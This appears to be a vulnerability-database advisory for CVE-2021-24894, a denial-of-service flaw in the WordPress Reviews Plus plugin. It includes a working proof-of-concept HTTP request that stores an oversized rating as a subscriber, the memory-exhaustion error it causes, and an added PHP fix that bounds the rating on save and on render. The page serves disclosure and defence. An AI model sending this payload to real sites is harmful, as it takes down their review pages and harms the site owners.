Reviews Plus < 1.2.14 Subscriber+ DoS exploit
Reporter | Title | Published | Views | Family |
---|---|---|---|---|
Cvelist | CVE-2021-24894 Reviews Plus < 1.2.14 - Subscriber+ Reviews DoS | 23 Nov 2021 19:16 | – | cvelist |
Patchstack | WordPress Reviews Plus plugin <= 1.2.13 - Reviews Denial of Service (DoS) vulnerability | 25 Oct 2021 00:00 | – | patchstack |
WPVulnDB | Reviews Plus < 1.2.14 - Subscriber+ Reviews DoS | 25 Oct 2021 00:00 | – | wpvulndb |
NVD | CVE-2021-24894 | 23 Nov 2021 20:15 | – | nvd |
Prion | Design/Logic Flaw | 23 Nov 2021 20:15 | – | prion |
CVE | CVE-2021-24894 | 23 Nov 2021 20:15 | – | cve |
Source | Link |
---|---|
plugins | www.plugins.trac.wordpress.org/changeset/2618234 |
Enable reviews for posts/pages, and enable the "Show Reviews on" setting for all posts or pages as well.
Then log in as a user such as a subscriber and submit a review with a long rating, e.g.:
```
POST /wp-comments-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Connection: close
Cookie: [subscriber+]
Upgrade-Insecure-Requests: 1

comment_type=ic_rev_post&review_type=ic_rev_post&ic_review_rating=100000000000000000000000&ic_review_title=aa&comment=cerh&submit=Submit+Review&comment_post_ID=2123&comment_parent=0
```
When the post/page is viewed, its review section crashes with an error like "Allowed memory size of 268435456 bytes exhausted (tried to allocate 249561152 bytes) in /var/www/wp-content/plugins/reviews-plus/functions/functions.php on line 76".
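Added example (not the plugin's code and not the patch from the changeset above): bounding the rating when a review is submitted and again when it is rendered, since the crash occurs at view time and an oversized value may already be stored. The 1-5 scale, the star renderer, and the names `normalize_rating` and `render_stars` are assumptions.

```php
<?php
// Added example, not Reviews Plus code. RATING_MIN/RATING_MAX and both
// function names are hypothetical; the 1-5 scale is an assumption.
const RATING_MIN = 1;
const RATING_MAX = 5;

/**
 * Validate a rating taken from request input (e.g. ic_review_rating).
 * Returns an int within the scale, or null when the value must be rejected.
 */
function normalize_rating($raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;                      // arrays, floats, null, ...
    }
    $raw = trim((string) $raw);
    // Digits only, and short enough that the int cast below cannot overflow.
    if ($raw === '' || strlen($raw) > 3 || !ctype_digit($raw)) {
        return null;
    }
    $n = (int) $raw;
    return ($n >= RATING_MIN && $n <= RATING_MAX) ? $n : null;
}

/**
 * Render stars for a stored rating. The stored value is validated again here
 * because rows written before the input check existed may still be oversized,
 * so output size never depends on attacker-controlled data.
 */
function render_stars($stored): string
{
    $n = normalize_rating(is_scalar($stored) ? (string) $stored : null) ?? 0;
    return str_repeat('★', $n) . str_repeat('☆', RATING_MAX - $n);
}

// Constructed inputs: the value from the request above, plus edge cases.
foreach (['100000000000000000000000', '5', '0', '-1', '4.5', ['5']] as $in) {
    $out = normalize_rating($in);
    printf("%-28s => %s\n", json_encode($in), $out === null ? 'rejected' : $out);
}
// A previously stored oversized rating is treated as "no rating" at render time.
echo render_stars('100000000000000000000000'), "\n";
```

In a WordPress plugin the first check belongs where the review is saved and the second where the stored value is read back for display.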